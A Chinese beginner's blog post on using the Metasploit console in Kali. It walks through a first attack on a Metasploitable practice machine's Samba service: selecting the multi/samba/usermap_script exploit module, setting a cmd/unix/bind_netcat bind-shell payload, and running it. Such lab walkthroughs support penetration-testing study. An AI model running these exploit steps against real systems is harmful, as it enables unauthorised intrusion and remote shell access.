Day3:msfconsole控制台终端

xiaoxiao2021-02-28  78

Day3:msfconsole控制台终端

对于图形交互界面的msf我个人不是很习惯,但是msf终端对于新手来说友好性还是差了很多,但是我还是决定从msf终端入手,但是要细心:Festinatione facit vastum。 溯回传送门

MSF终端的优势(与其他Metasploit用户接口的对比):

〼 提供一站式的交互接口,能够访问Metasploit框架中几乎每一项功能和特性,而且可以直接执行外部的shell命令和第三方工具(Nmap),这使得你可以在msf终端完成绝大部分的渗透测试工作。 〼 提供非常便利且符合Linux操作习惯的交互,支持命令的补全,用户配置的保存和装载等功能,在用户熟悉改交互环境时可以提供非常搞笑的Metasploit用户接口。 〼 msf终端也是目前更新最及时,并且最稳定的Metasploit用户接口。

初试msf(Kali环境下):

启动msf终端的命令行如下所示:

root@kali:~# msfconsole

此时可能出现的问题:

Failed to connect to the database: could not connect to server: Connection refused Is the server running on host xxxxxxxx.

解决方法:传送门


打开后的msf界面:


启动后需要做的事情:

1、查看帮助

在msf控制台输入:

msf > help search

查看所有帮助:命令、命令参数等。

2、第一次渗透测试

针对Linux metasploittable靶机环境中存在的Samba服务漏洞进行渗透攻击测试。 1、首先使用search命令,从Metasploit众多强大的渗透代码库中找到攻击Samba服务的模块:

msf > search samba

2、从中找到针对usermap_script安全漏洞的渗透攻击模块名称为multi/samba/usermap_script,然后运行:

msf > use multi/samba/usermap_script

3、输入show payload查看与该渗透攻击模块相兼容的攻击载荷。执行set payload cmd/unix/bind_netcat选择bind_netcat,即使用netcat工具在渗透攻击成功后执行Shell,并通过netcat绑定在一个监听端口。再选择show options来查看需要设置哪些参数,具体操作如下:

4、一键开始,在设定好所有参数后,输入以下命令开始:

msf exploit(usermap_script) > exploit

Bingo,第一次渗透成功! ヾ(◍°∇°◍)ノ゙

转载请注明原文地址: https://www.6miu.com/read-47829.html

最新回复(0)